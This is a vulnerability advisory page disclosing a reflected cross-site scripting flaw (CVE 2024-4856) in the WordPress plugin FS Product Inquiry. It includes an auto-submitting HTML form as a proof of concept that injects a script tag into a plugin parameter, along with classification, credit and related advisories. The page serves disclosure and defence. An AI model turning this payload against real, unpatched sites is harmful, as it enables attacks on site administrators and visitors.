FS Product Inquiry <= 1.1.1 – Reflected XSS | CVE 2024-4856 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin or unauthenticated users

Proof of Concept

Have any user (admin or unauthenticated) open an HTML page with the following:

```
<body onload="document.forms[0].submit()"><form action="http://wps-test.ddev.site/fspi-product-inquiry/" method="POST"><input type="text" name="_fs_product_id" value='"><script>alert(2)</script>'><input type="submit" value="submit"></form></body>
```

Affects Plugins

fs-product-inquiry

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

6cf90a27-55e2-4b2c-9df1-5fa34c1bd9d1

Timeline

Publicly Published

2024-05-14 (about 1 months ago)

Added

2024-05-14 (about 1 months ago)

Last Updated

2024-05-14 (about 1 months ago)

Other

Published

Title

Published

2021-07-23

Title

GTranslate < 2.8.65 - Reflected Cross-Site Scripting (XSS)

Published

2021-10-05

Title

World Travel Information <= 1.0.0 - Reflected Cross-Site Scripting

Published

2023-09-18

Title

Poptin < 1.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Published

2024-06-22

Title

Hostel < 1.1.5.3 - Reflected XSS

Published

2024-03-25

Title

Media Cloud for Amazon S3, Imgix, Google Cloud Storage, DigitalOcean Spaces and more < 4.5.25 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode